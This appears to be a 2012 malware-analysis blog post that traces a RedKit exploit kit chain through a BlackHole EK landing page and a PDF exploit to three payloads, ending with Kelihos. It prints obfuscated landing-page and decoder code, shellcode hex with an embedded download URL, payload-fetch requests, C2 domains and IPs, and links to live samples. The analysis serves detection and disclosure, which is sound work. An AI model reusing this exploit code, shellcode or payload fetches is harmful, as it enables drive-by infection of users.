Sunday, December 30, 2012

What happened if Red Kit Exploit Kit team up with BlackHole EK? = Tripple payload + infection of Khelios!

It is the last crusade of the year 2012, crusade was started by the lead of RedKit. We heard that RedKit is going into a heavy customization, so it is good for the new year's adventure as the "different"challenge than BHEK.

Sadly, I am in hospital writing this, on duty of waiting for my Dad to be transferred to other place, so I just depend on my Note PC to do analyze this, please bear these initial result, I will add it with binary analysis details after new year. Unfortunately, this case is longer than I expected, indeed it is good to kill my waiting time.

So here we go, the RedKit Exploit Kit to BHEK with tripple payload downloads case, ending up with Khelios :-)

Infector URL:

h00p://optik-welter.de/hcwf.htm
using the google as referer+IE java headers, we fetched it:
--17:58:21--  h00p://optik-welter.de/hcwf.htm
           => `hcwf.htm'
Resolving optik-welter.de... seconds 0.00, 82.165.104.24
Caching optik-welter.de => 82.165.104.24
Connecting to optik-welter.de|82.165.104.24|:80... seconds 0.00, connected.
GET /hcwf.htm HTTP/1.0

Referer: http://www.google.com/url?..
User-Agent: MalwareMustDie painted your front door *pink*
Accept: */*
Host: optik-welter.de
Connection: Keep-Alive
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Date: Sun, 30 Dec 2012 08:58:22 GMT
Server: Apache
X-Powered-By: PHP/4.4.9
Content-Length: 12996
Keep-Alive: timeout=2, max=200
Connection: Keep-Alive
Content-Type: text/html
---response end---
200 OK
17:58:23 (41.24 KB/s) - `hcwf.htm' saved [12996/12996]
let's see the insides:
<html><body><td>Ydoanunan onontothmeiun we i de idedovoitthcode..
ive="h00p://optik-welter・de/332.jar" code="Runs.class"><param n..
obapoptdellobapophh0llobapop.qvllobapop3ytllobapop3kzllobapop/f..
bapoprxkllobapopey5llobapoptrrllobapoplwallobapope5illobapopwg4..
apoptg9llobapoppmkllobapopo2tllobapop/lrllobapop/olllobapop:36l..
pophwlllobapop"></applet><applet archive="h00p://optik-welter.d..
ame="elitken" value="lv9llobapopm0kllobapopt0vllobapophczllobap..
gllobapopezlllobapopdi1llobapop.l8llobapoprp1llobapope3pllobapo..
llobapop-iallobapopkkdllobapopi3kllobapoptyillobapoppydllobapop..
lobapoppdallobapopt82llobapoptlcllobapophk5llobapop"></applet>..
 var jsou = "src";
     var cxhy=document.createElement("iframe"); 
  function dettq()     
  {  
  document.body.appendChild(cxhy);  
  cxhy.setAttribute(jsou,"h00p://optik-welter・de/  
  }  
  var Ganni={version:"0.7.7",rDate:"04/11/2012",n..  
eturn function(){c(b,a)}},isDefined:function(b){return typeof b .. 
turn(/array/i).test(Object.prototype.toString.call(b))},isFunc:..
n"},isString:function(b){return typeof b=="string"},isNum:funct..
trNum:function(b){return(typeof b=="string"&&(/\d/).test(b))},g..
egx:/[\.\_,-]/g,getNum:function(b,c){var d=this,a=d.isStrNum(b)..
umRegx).exec(b):null;return a?a[0]:null},compareNums:function(h..
   :
   : (snipped)
   :
Ganni.initScript();

flopp=Ganni.getVersion("AdobeReader");
if(flopp)
{
flopp=flopp.split(',');
if (((3+1) > flopp[1]  && (8+1)==flopp[0]) || ((2+1) > flopp[1] && (7+1)==flopp[0])) 
 {  
   cxhy.setAttribute("width",4);
   cxhy.setAttribute("height",12);
  dettq();
  }
}</script></body></html>
↑We see the plugin detect old version (0.7.7) modified for the evil purpose.. In the plugin detect script we can easily see some suspicious malware infector downloads urls like:
h00p://optik-welter.de/332.jar
h00p://optik-welter.de/887.jar
h00p://optik-welter.de/987.pdf
↑It is good to try to download these, go ahead to try, but I prefer to go straightly to payload.

The Sharing of RedKit EK Infector Source/Code

The complete landing page HTML code is pasted here -->>[PASTEBIN]
The plugin detect 0.7,7 code is in here -->>[PASTEBIN]

Guide to Crack the RedKit Landing Page Code (to fetch the 1st payload)

In the landing page there's the applet code that can lead us to the payload. The below applet code is one of the key to fetch payload:
<applet archive="h00p://optik-welter.de/332.jar" code="Runs.class">
<param name="elitken" value="lrkllobapopm0illobapoptdellobapophh0llobapop.qvllobapop3ytllobapop3kzllobapop/f0llobapope8xllobapopdxqllobapop.hkllobapoprxkllobapopey5llobapoptrrllobapoplwallobapope5illobapopwg4llobapop-adllobapopkyyllobapopil8llobapoptg9llobapoppmkllobapopo2tllobapop/lrllobapop/olllobapop:36llobapoppx2llobapopt4gllobapoptgqllobapophwlllobapop">
</applet>
let's take the parameter elitken's value:
 lrkllobapopm0illobapoptdellobapophh0llobapop.qvllobapop3ytllobapop3kzllobapop/f0
llobapope8xllobapopdxqllobapop.hkllobapoprxkllobapopey5llobapoptrrllobapoplwa
llobapope5illobapopwg4llobapop-adllobapopkyyllobapopil8llobapoptg9llobapoppmk
llobapopo2tllobapop/lrllobapop/olllobapop:36llobapoppx2llobapopt4gllobapoptgq
llobapophwlllobapop
You see the the repetition of "llobapop" strings? It is actually a delimiter.
So let's start eliminate them, then we get below sets of garbled words:
lrk m0i tde hh0 .qv 3yt 3kz /f0 e8x dxq .hk rxk ey5 trr lwa 
e5i wg4 -ad kyy il8 tg9 pmk o2t /lr /ol :36 px2 t4g tgq hwl
To decode this, we noticed the simple trick by taking the first character in each words & gather those first character backward, we'll get the download url:
h00p://optik-welter.de/33.html

Payload 1

The above url is actually a payload's url. 33.html is actually a php script to feed you with payload binary file setup.exe, as per below PoC:
@unixfreaxjp /malware]$ myfetch h00p://optik-welter.de/33.html

--18:16:43--  h00p://optik-welter.de/33.html
           => `33.html'
Resolving optik-welter.de... seconds 0.00, 82.165.104.24
Caching optik-welter.de => 82.165.104.24
Connecting to optik-welter.de|82.165.104.24|:80... seconds 0.00, connected.

GET /33.html HTTP/1.0
Referer: h00p://www.google.com/..
User-Agent: #MalwareMustDie is hammering your door with nails.
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Host: optik-welter.de
Connection: Keep-Alive
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
    :
HTTP request sent, awaiting response...
    :
HTTP/1.1 200 OK
Date: Sun, 30 Dec 2012 09:16:44 GMT
Server: Apache
X-Powered-By: PHP/4.4.9
Expires: Mon, 20 Aug 2002 02:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache
Content-Transfer-Encoding: binary
Content-Disposition: inline; filename=setup.exe
Content-Length: 41472
Keep-Alive: timeout=2, max=200
Connection: Keep-Alive
Content-Type: application/octet-stream
   :
200 OK
18:16:46 (37.76 KB/s) - `33.html' saved [41472/41472]

@unixfreaxjp /malware]$ ls -alF 33.html
-rwxr--r--  1 rik  wheel  41472 Dec 30 18:16 33.html*

@unixfreaxjp /malware]$ mycheckbin ./33.html
0000   4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00    MZ..............
0010   B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00    ........@.......
0020   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0030   00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00    ................
0040   0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68    ........!..L.!Th
0050   69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F    is program canno
0060   74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20    t be run in DOS
0070   6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00    mode....$.......
0080   50 45 00 00 4C 01 07 00 5C 82 DF 50 00 00 00 00    PE..L......P....
 :                         :                                    :
 snipped....snipped..
↑Yes it is a binary file, was set to be "setup.exe". I will do the binary analysis later, but let me explain what this malware does after executed into your system:

1. After injecting malicious code into another process:

0xdc setup.exe 
0x348 svchost.exe
2. It tried connecting to the below malware domains:
a-wing.com.ar 
girasoles-web.com.ar 
hsd-transport.com 
amcarlosbarrios.es 
littleowlletterpress.com 
beach-hotel-andalusia.com 
jastreb.hr 
gyneco-saint-andre.fr 
aliyahraks.com 
tvmarinaresort.com 
3. Each connected domains will be requested HTTP/GET:
a-wing.com.ar GET /h.htm HTTP/1.1
girasoles-web.com.ar GET /g.htm HTTP/1.1
hsd-transport.com GET /g.htm HTTP/1.1
amcarlosbarrios.es GET /m.htm HTTP/1.1
littleowlletterpress.com GET /v.htm HTTP/1.1
beach-hotel-andalusia.com GET /x.htm HTTP/1.1
jastreb.hr GET /c.htm HTTP/1.1
gyneco-saint-andre.fr GET /y.htm HTTP/1.1
aliyahraks.com GET /u.htm HTTP/1.1
tvmarinaresort.com GET /o.htm HTTP/1.1
↑these requests are rapidly queried, I counted in my machine within 90sec it requested 22,000 requests!

4. Upon connected you will be redirected to BHEK↓

--20:26:56--  h00p://beach-hotel-andalusia.com/x.htm
           => `x.htm'
Resolving beach-hotel-andalusia.com... seconds 0.00, 213.175.208.2
Caching beach-hotel-andalusia.com => 213.175.208.2
Connecting to beach-hotel-andalusia.com|213.175.208.2|:80... seconds 0.00, connected.
  :
GET /x.htm h00p/1.0
Referer: h00p://www.google.com/url?..
User-Agent: #MalwareMustDie is tired knocking so many doors..
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plai
n;q=0.8,image/png,*/*;q=0.5
Host: beach-hotel-andalusia.com
Connection: Keep-Alive
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
  :
h00p request sent, awaiting response...
  :
h00p/1.1 301 Moved Permanently
Content-Length: 239
Content-Type: text/html
Location: h00p://linsubby.ru/count4.php
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 30 Dec 2012 11:27:02 GMT
Connection: close
  :
301 Moved Permanently
Location: h00p://linsubby.ru/count4.php [following]
--20:26:57--  h00p://linsubby.ru/count4.php
           => `count4.php'
Resolving linsubby.ru... seconds 0.00, 31.207.231.141
Caching linsubby.ru => 31.207.231.141
Connecting to linsubby.ru|31.207.231.141|:80... seconds 0.00, connected.
  :
GET /count4.php h00p/1.0
Referer: h00p://www.google.com/url?..
User-Agent: #MalwareMustDie is tired knocking so many doors..
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plai
n;q=0.8,image/png,*/*;q=0.5
Host: linsubby.ru
Connection: Keep-Alive
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
  :
h00p request sent, awaiting response...
  :
h00p/1.1 302
Server: Apache
Content-Length: 0
Content-Type:
Last-Modified: ┬±, 30 ΣσΩ 2012 11:27:01 GMT
Accept-Ranges: bytes
Server:nginx/0.8.34
Date:Sun, 30 Dec 2012 11:26:59 GMT
X-Powered-By:PHP/5.3.2
Location:h00p://wufjajcy.ru/links/1.php
  :
302
Location: h00p://wufjajcy.ru/links/1.php [following]
Closed fd 1896
--20:27:00--  h00p://wufjajcy.ru/links/1.php
           => `1.php'
Resolving wufjajcy.ru... seconds 0.00, 184.82.27.102
Caching wufjajcy.ru => 184.82.27.102
Connecting to wufjajcy.ru|184.82.27.102|:80... seconds 0.00, connected.
Created socket 1896.
Releasing 0x003d6548 (new refcount 1).
  :
GET /links/1.php h00p/1.0
Referer: h00p://www.google.com/url?..
User-Agent: #MalwareMustDie is tired knocking so many doors..
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plai
n;q=0.8,image/png,*/*;q=0.5
Host: wufjajcy.ru
Connection: Keep-Alive
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
  :
h00p request sent, awaiting response...
  :
h00p/1.1 200 OK
Server: nginx/1.0.15
Date: Sun, 30 Dec 2012 11:27:06 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.18
  :
200 OK
Length: unspecified [text/html]
20:27:17 (6.67 KB/s) - `1.php' saved [92673]
After being redirected few times, we arrived at wufjajcy.ru to fetch 1.php file. This 1.php file is the BHEK landing page.

The Sharing of BHEK Infector Resources/Code

The BHEK landing page HTML code is here--->>[PASTEBIN] The decoded BHEK PluginDetect 0.7.9 is here -->>[PASTEBIN] (Please read our previous post about BHEK for the guidance to decode) The BHEK was weaponized for ONLY dropping the PDF at the function p1:
function p1(){
  var d = document.createElement("object");
  d.setAttribute("data", "/links/1.php?dcdjf=" + x("c833f") + "&nybnj=" + x("cqk") + 
  "&kve=1j:1n:1m:1l:1m:2w:31:1j:1m:1g&vbpuhlu=" + x(pdfver.join(".")));
  d.setAttribute("type", "application/pdf");
  document.body.appendChild(d);}
As per explained before, let's use THEIR function to crack their code:
var a=x("TYPE-THE-STRING-HERE");
function x(s){   
  d = [];
  for (i = 0; i < s.length; i ++ ){
  k = (s.charCodeAt(i)).toString(33);
  d.push(k);   }  ;   return d.join(":");}
document.write(a);
Which lead us to the download url of:
/links/1.php?dcdjf=30:1n:1i:1i:33&nybnj=30:3e:38&kve=1j:1n:1m:1l:1m:2w:31:1j:1m:1g&vbpuhlu=1k:1d:1f:1d:1g:1d:1f
Wrapped it with the BHEK domain name and download it:
URL: h00p://wufjajcy.ru/links/1.php?dcdjf=30:1n:1i:1i:33&nybnj=30:3e:38&kve=1j:1n:1m:1l:1m:2w:31:1j:1m:1g&vbpuhlu=1k:1d:1f:1d:1g:1d:1f
GET /links/1.php?dcdjf=30:1n:1i:1i:33&nybnj=30:3e:38&kve=1j:1n:1m:1l:1m:2w:31:1j:1m:1g&vbpuhlu=1k:1d:1f:1d:1g:1d:1f HTTP/1.0
Referer: http://www.google.com/url?..
User-Agent: I am speachless seeing how fool your codes are - #MalwareMustDie
Accept: */*
Host: wufjajcy.ru
Connection: Keep-Alive
  :
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Sun, 30 Dec 2012 12:18:46 GMT
Content-Type: application/pdf
Connection: keep-alive
X-Powered-By: PHP/5.3.18
Content-Length: 21419
ETag: "834215633845d4bc9d54eff04e9f149b"
Last-Modified: Sun, 30 Dec 2012 12:19:11 GMT
Accept-Ranges: bytes
  :
200 OK
Registered socket 1896 for persistent reuse.
Length: 21,419 (21K) [application/pdf]
21:18:45 (9.04 KB/s) - `1.php@dcdjf' saved [21419/21419]
The downloaded file is actually a PDF file, contains evil JavaScript.
That code is at 0x48D; I made GUIDE to crack & analyze it here--->>[PASTEBIN]
The usage of Adobe Reader exploit codes of
(1) Collab.getIcon Exploit CVE-2009-0927 , and (2) Collab.collectEmailInfo CVE-2007-5659
↑clearly stated in the guide that exploit was used - to execute the obfuscated shellcode strings, which in HEX can be viewed as per below:
66 83 e4 fc fc 85 e4 75  34 e9 5f 33 cO 64 8b 4O   f......u4._3.d.@
3O 8b 4O Oc 8b 7O 1c 56  8b 76 O8 33 db 66 8b 5e   O.@..p.V.v.3.f.^
3c O3 74 33 2c 81 ee 15  1O ff ff b8 8b 4O 3O c3   <.t3,........@O.
46 39 O6 75 fb 87 34 24  85 e4 75 51 e9 eb 4c 51   F9.u..4$..uQ..LQ
56 8b 75 3c 8b 74 35 78  O3 f5 56 8b 76 2O O3 f5   V.u<.t5x..V.v...
33 c9 49 41 fc ad O3 c5  33 db Of be 1O 38 f2 74   3.IA....3....8.t
O8 c1 cb Od O3 da 4O eb  f1 3b 1f 75 e6 5e 8b 5e   ......@..;.u.^.^
24 O3 dd 66 8b Oc 4b 8d  46 ec ff 54 24 Oc 8b d8   $..f..K.F..T$...
O3 dd 8b O4 8b O3 c5 ab  5e 59 c3 eb 53 ad 8b 68   ........^Y..S..h
2O 8O 7d Oc 33 74 O3 96  eb f3 8b 68 O8 8b f7 6a   ..}.3t.....h...j
O5 59 e8 98 ff ff ff e2  f9 e8 OO OO OO OO 58 5O   .Y............XP
6a 4O 68 ff OO OO OO 5O  83 cO 19 5O 55 8b ec 8b   j@h....P...PU...
5e 1O 83 c3 O5 ff e3 68  6f 6e OO OO 68 75 72 6c   ^......hon..hurl
6d 54 ff 16 83 c4 O8 8b  e8 e8 61 ff ff ff eb O2   mT........a.....
eb 72 81 ec O4 O1 OO OO  8d 5c 24 Oc c7 O4 24 72   .r.......\$...$r
65 67 73 c7 44 24 O4 76  72 33 32 c7 44 24 O8 2O   egs.D$.vr32.D$..
2d 73 2O 53 68 f8 OO OO  OO ff 56 Oc 8b e8 33 c9   -s.Sh.....V...3.
51 c7 44 1d OO 77 7O 62  74 c7 44 1d O5 2e 64 6c   Q.D..wpbt.D...dl
6c c6 44 1d O9 OO 59 8a  c1 O4 3O 88 44 1d O4 41   l.D...Y...O.D..A
51 6a OO 6a OO 53 57 6a  OO ff 56 14 85 cO 75 16   Qj.j.SWj..V...u.
6a OO 53 ff 56 O4 6a OO  83 eb Oc 53 ff 56 O4 83   j.S.V.j....S.V..
c3 Oc eb O2 eb 13 47 8O  3f OO 75 fa 47 8O 3f OO   ......G.?.u.G.?.
75 c4 6a OO 6a fe ff 56  O8 e8 9c fe ff ff 8e 4e   u.j.j..V.......N
Oe ec 98 fe 8a Oe 89 6f  O1 bd 33 ca 8a 5b 1b c6   .......o..3..[..
46 79 36 1a 2f 7O 68 74  74 7O 3a 2f 2f 77 75 66   Fy6./phOOp://wuf
6a 61 6a 63 79 2e 72 75  2f 6c 69 6e 6b 73 2f 31   jajcy.ru/links/1
2e 7O 68 7O 3f 7a 65 67  71 71 7a 68 3d 33 3O 3a   .php?zegqqzh=3O:
31 6e 3a 31 69 3a 31 69  3a 33 33 26 75 77 75 63   1n:1i:1i:33&uwuc
3d 31 6a 3a 31 6e 3a 31  6d 3a 31 6c 3a 31 6d 3a   =1j:1n:1m:1l:1m:
32 77 3a 33 31 3a 31 6a  3a 31 6d 3a 31 67 26 63   2w:31:1j:1m:1g&c
6e 77 3d 31 68 26 6b 72  61 63 3d 6b 66 78 69 26   nw=1h&krac=kfxi&
7a 61 67 6f 3d 6d 71 73  71 6a 78 77 67 OO OO OO   zago=mqsqjxwg...

Payload 2

In the bottom of the HEX code you can see the payload url :-) let's fetch it:
URL: h00p://wufjajcy.ru/links/1.php?zegqqzh=30:1n:1i:1i:33&uwuc=1j:1n:1m:1l:1m:2w:31:1j:1m:1g&cnw=1h&krac=kfxi&zago=mqsqjxwg
GET /links/1.php?zegqqzh=30:1n:1i:1i:33&uwuc=1j:1n:1m:1l:1m:2w:31:1j:1m:1g&cnw=1h&krac=kfxi&zago=mqsqjxwg HTTP/1.0
Referer: http://www.google.com/url?..
User-Agent: MalwareMustDie is taking a break... running out of paint..
Accept: */*
Host: wufjajcy.ru
Connection: Keep-Alive
---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Sun, 30 Dec 2012 13:11:48 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
X-Powered-By: PHP/5.3.18
Pragma: public
Expires: Sun, 30 Dec 2012 13:12:19 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="calc.exe"
Content-Transfer-Encoding: binary
Content-Length: 23040
---response end---
200 OK
Length: 23,040 (23K) [application/x-msdownload]
100%[=================> ] 23,040         3.49K/s    ETA 00:00
22:11:52 (3.49 KB/s) - `calc.exe' saved [23040/23040]
Another payload, calc.exe, so be it. This calc.exe will self-deleted+copied to:
%System%\ntvdm.exe
And run by CMD to start these processes:
0x348 svchost.exe 
0x420 svchost.exe 
0x7e4 ntvdm.exe 
0x7e4 ntvdm.exe 
0x7e4 ntvdm.exe 
And then requesting connection to these random domains:
 cucaklif.ru
 worgukiw.ru
 oqivynle.ru
 voxyqjyc.ru
 qysriloh.ru
 lymurufa.ru
 ektizzab.ru
 batycfac.ru
 akmaxook.ru
 nosgazim.ru
 nopepkaq.ru
 lofibvar.ru
 lejbomor.ru
 yficebnu.ru
 tyjkexax.ru
    :
  (and maybe others after getting some chance to analyze the binary)
The domain & IP info of calc.exe:
wufjajcy.ru  A  184.82.27.102
wufjajcy.ru  NS  ns1.larstor.com
wufjajcy.ru  NS  ns2.larstor.com
wufjajcy.ru  NS  ns3.larstor.com
wufjajcy.ru  NS  ns4.larstor.com
wufjajcy.ru  NS  ns5.larstor.com
wufjajcy.ru  NS  ns6.larstor.com

Payload 3

This calc.exe is downloading another malware file "newbos2.exe" via HTTP GET command, with PoC:
--22:21:21--  h00p://cucaklif.ru/newbos2.exe
           => `newbos2.exe'
Resolving cucaklif.ru... seconds 0.00, 37.19.146.142
Caching cucaklif.ru => 37.19.146.142
Connecting to cucaklif.ru|37.19.146.142|:80... seconds 0.00, connected.
  :
GET /newbos2.exe HTTP/1.0
Accept: */*
Host: cucaklif.ru
Connection: Keep-Alive
HTTP request sent, awaiting response...
HTTP/1.1 200 Ok
Server: Apache
Content-Length: 763904
Content-Type: application/octet-stream
Last-Modified: ┬≥, 01  φΓ 2002 02:16:15 GMT
Accept-Ranges: bytes
200 Ok
Length: 763,904 (746K) [application/octet-stream]
100%[===================================> ] 763,904        7.06K/s    ETA 00:00
22:31:13 (1.26 KB/s) - `newbos2.exe' saved [763904/763904]
A quick sandbox analysis is:
// SELF-EXECUTED...

PId: 0x4ac 
Image Name: C:\newbos2.exe 
API:
CreateServiceA(hSCManager: 0x157048, 
lpServiceName: "NPF", 
lpDisplayName: "WinPcap Packet Driver (NPF)", 
dwDesiredAccess: 0xf01ff, 
dwServiceType: 0x1, 
dwStartType: 0x3, 
dwErrorControl: 0x1, 
lpBinaryPathName: "system32\drivers\NPF.sys", 
lpLoadOrderGroup: "(null)", 
lpdwTagId: 0x0, 
lpDependencies: 0x0, 
lpServiceStartName: "(null)", 
lpPassword: 0x0)

// REGISTRY...

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\SonyAgent 
REG_SZ 38 "C:\newbos2.exe"

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ContextChangedCurrent 
REG_SZ 138 "DMaWNZ4Ku1rL7IDJKR1RYFEEIRwBnxpmODxxvk5HaMX2C4K67X6Jyj7poL8MPRl87w=="

HKLM\System\CurrentControlSet\Services\NPF\DisplayName 
REG_SZ 56 "WinPcap Packet Driver (NPF)"

LM\System\CurrentControlSet\Services\NPF\ImagePath 
REG_EXPAND_SZ 50 "system32\drivers\NPF.sys"

//SOME DROPS....

C:\WINDOWS\system32\drivers\npf.sys
C:\WINDOWS\system32\Packet.dll
C:\WINDOWS\system32\wpcap.dll

//STARTING SERVICE: WinPcap Packet Driver (NPF) up...

CreateServiceA(hSCManager: 0x157048, 
lpServiceName: "NPF", 
lpDisplayName: "WinPcap Packet Driver (NPF)", 
dwDesiredAccess: 0xf01ff, 
dwServiceType: 0x1, 
dwStartType: 0x3, 
dwErrorControl: 0x1, 
lpBinaryPathName: "system32\drivers\NPF.sys", 
lpLoadOrderGroup: "(null)", 
lpdwTagId: 0x0, 
lpDependencies: 0x0, 
lpServiceStartName: "(null)", 
lpPassword: 0x0)

// SUSPICIOUS HTTP querry:

\x9e\x85ez\xc9\x85ez\xd9\x85ez
\x9e\x85ez\xec\x85ez\xfc\x85ez-\x8bez\"\x8aez2\x8bez\x16z\xe4\x13?\xdfm\xbaC,\xf3\xe2d\x1e\xb1H\xffP\xb3\xf6\xec]\x0fd\x97\xdd\x85\x93W\xa2;Xo\x82\x11k\x05\x9b\xf1\xe7:|\xd3\xf98\x88\xc8\x8e\xfdf\x0f\xe2\xcbs\xf0\x07\xa31\x99\x1f\x9ee@\x01R\x91\x1d\xc80>t\xdf-L\xe6\x1d\xa2\x0f\x16z\xe4\x13?\xdfm\xbaC,\xf3\xe2d\x1e\xb1Hso\xc8\xe5\xb0\xc8A\x11\xc6L\xea\xb0\x04\x13\xa5\x83}^`8Dp\xcd
\x9e\x85ez\xc9\x85ez\xd9\x85ez
\x9e\x85ezg\x86ezw\x86ez\xa8\x8bez\x9d\x8aez\xad\x8bez\xad=P\xdf\tj\x86\xf7\x8b\x10>\x18BA\x9b\x90\xd5\xe3\xc0\xec\xb5_N\xb6\xe3\x92\vkL\x86\xb8\x02\xe3\x9dH\x1c\x88\x82<!b\x94E
\x9e\x85ezc\x86ezs\x86ez\xa4\x8bez\x99\x8aez\xa9\x8bez\xa7\x91\xb4\xed\xa3RW#\"p\x87)P\xd4\x98\xb3\x99\x1a\x869\x1dGo\xf2B\xdc\x9e\x97\xdb\x07HN\xec\x8d\xe3I\x8f\xd3\x9br(\xba\x99\x86c\xd9\xb6kB\x9ab\xa3-\\\x1f\xe0\xb1\x88\xb8\xc3)\vg\xech^P+1\xe9\xdf\xa8\x1a(\xe3\xe5\xe2\xe2\x07\"K\xa8Jx
\x9e\x85ez\xc9\x85ez\xd9\x85ez
\x9e\x85ezV\x86ezf\x86ez\x97\x8bez\x8c\x8aez\x9c\x8bez\x1bu\x8d\xd4\xe0BX\x98\x07\x8c\xde2\xa7\x1a\x9e\xcb2$S\xe9\xb8\x13\xc9\x94\xcb\xb46\x83\x85\xa9\x191.\\?B\xe9\x97X\xf5\xf0+\xe2Oq\x04b\xc8#!N:\xe5\x04\x89\xfe\x87\xc6\xa2[\x85\bU\xda\xeb\x8a_\x80\xf3\x1a\xeb\x95\tn\xb8\xf0\xe1\xda\x9d\xcf\xca\x88Z\xd6\x92\xf3\x03\xef:R\x04\xc4e~\x9ct*=\x92\x93\x15\xc3U\x91\x1d\xe5:F\xaa\x0c\xe6$b\xd3+\xc8\xa7\xe7\x1e)\b\xfe\x0cC5\x852ca9#nz]\xdd\xe5\xf9\xaf\x1a)h\x98\xaa6\xa8\x12\xb9p\xbdfj\xbe\x89\xb8~\b\xc6\xb3\xc4\xe4\x86\xfd\xdcC\xc6&\xff\x9c\xc9\x96\x1e(E>j\x88\xdce$r\x93\x97\x98\xf2\x1bu\x8d\xd4\xe0BX\x98\x07\x8c\xde2\xa7\x1a\x9e\xcb\x8dEIu\xb8'htt\xa6\xb2\x97\xec\x91\xcf\xcd\x9e\x85
\x9e\x85ez\xee\x85ez\xfe\x85ez/\x8bez$\x8aez4\x8bez\x07C\x12\xa3d\xb1J\xcfh\xcaI8u=\xb0\x03\xe09ak\xa6R.\xc4\r\x12\xadWN\x82
\x9e\x85ez\xfc\x85ez\x0c\x86ez=\x8bez2\x8aezB\x8bez\x0eqd\xf3\rV\xb3\xed\xfa\x1a\xabN\r\xf1CH\x17rX\x1c\xea\xd5\xb2P\\\xb8\xf1\xfd\\\x9d\xa7\"i\x18\xba6\xb9q\xb9\x05\x80\xc6m\xafO\xb4\xfa\x98\xb9&)Rh\xb8\xff|\xf8\x82\x9a'\x0e\x01\xefAz\t\"{\xaf#\xa9D\t \x97\x94\xe2\x06\xeb\xf8]`=\xe6\x0c\xd81\x1f\xc2q
\x9e\x85ez/\x86ez?\x86ezp\x8beze\x8aezu\x8bez\xd9Ji$g\xa0\xdb\x80\x99\x99\x85U\xa1\xf4?\xddA\x1b\x1fcc)\xb0\x17\xab\x04\xbf\x94\xd0\xc6\x1e\xd0\x88\xb3J\v'5j\x95ON\x9fo/\xfd\xe5',\xc2
\x9e\x85ez\xfb\x85ez\v\x86ez<\x8bez1\x8aezA\x8bez\xf3\xba\xf3\xedGF\xbc]\xef(\xe8u4\x91\x1fWQ\x80\x0c`\xdf0\xbe\xb9\xf0\xa4\x05E\xf6%\xc6\x10U\xff\x0e0\x17\x14\xdfuO\xd3\x0e\x91\xc2\x1d+\x1d\xd9\xa2\xcfma\xe3{\x1a\x9aZ/c5\xffD\xdf\x07G`\xe7n\xd9w\xd9\xf5%\xfdB\x19O\x80:\x81\xd5\xbb\xa8x.\x03Y!\x11gU\xb5\xf3\xba\xf3\xedGF\xbc]\xef(\xe8u4\x91\x1fWp\xf5M\x98S\x15\xd7\xf3?q\xc1u\x9f\xbc\xda|\xeb\xd5%\x9aJ\x8b\xbb7\x1c\xc4cQ\x87\xe8Ua\xadh1\xd8\x90\x11>\x89\xc1\"$\xe5K\xb65X^\xe3\x82\xef\xadd\x13\b-\x99\x84\\n\x19\xe4\xbbD>u

// EXECUTED THREAD PROCESSES..
0x2b0 lsass.exe 
0x3f4 svchost.exe 

// LOADING MODULE...
C:\WINDOWS\system32\wbem\wbemcons.dll by PID:0x3f4 (svchost.exe)

Virus Total Report

RedKit EK landing page - hcwf.htm 942641ec71e352d531805ed1082d6056 (0/44) BHEK landing page - 1.php a66429f2424a3824a9eb054a9084cf5b (3/46) RedKit Downloaded Troj1- setup.exe dc042fd30376f2f056ab3851be6190c7 (15/43) RedKit Downloaded Troj2- calc.exe 42a4de1001682f27ad55c893af9bd23d (12/46) BHEK PDF Trojan Downldr- sample3.pdf d68baa5a947cd84c993f6c5b972f6708 (22/46) Final Trojan Khelios - newbos2.exe 476f829bc53228c303331aa1f783f7f0 (12/46)

URL Query Report

Samples

:-) Here's the download url (for the research purpose only!) -->>[MEDIAFIRE]

Infector Domain Analysis

The Khelios Domain & Historical IP Information:
cucaklif.ru  A  5.79.227.65
cucaklif.ru  A  77.106.119.105
cucaklif.ru  A  88.206.64.69
cucaklif.ru  A  89.221.113.36
cucaklif.ru  A  95.104.102.82
cucaklif.ru  A  159.148.124.172
cucaklif.ru  A  177.199.108.51
cucaklif.ru  A  178.137.235.238
cucaklif.ru  A  188.19.160.215
cucaklif.ru  A  202.122.63.80
cucaklif.ru  A  203.80.126.186

worgukiw.ru  A  14.97.222.104
worgukiw.ru  A  24.14.110.124
worgukiw.ru  A  27.188.153.72
worgukiw.ru  A  37.229.235.32
worgukiw.ru  A  46.109.154.27
worgukiw.ru  A  46.161.190.98
worgukiw.ru  A  62.61.52.166
worgukiw.ru  A  68.56.17.213
worgukiw.ru  A  72.177.166.48
worgukiw.ru  A  87.110.18.105
worgukiw.ru  A  89.230.155.107
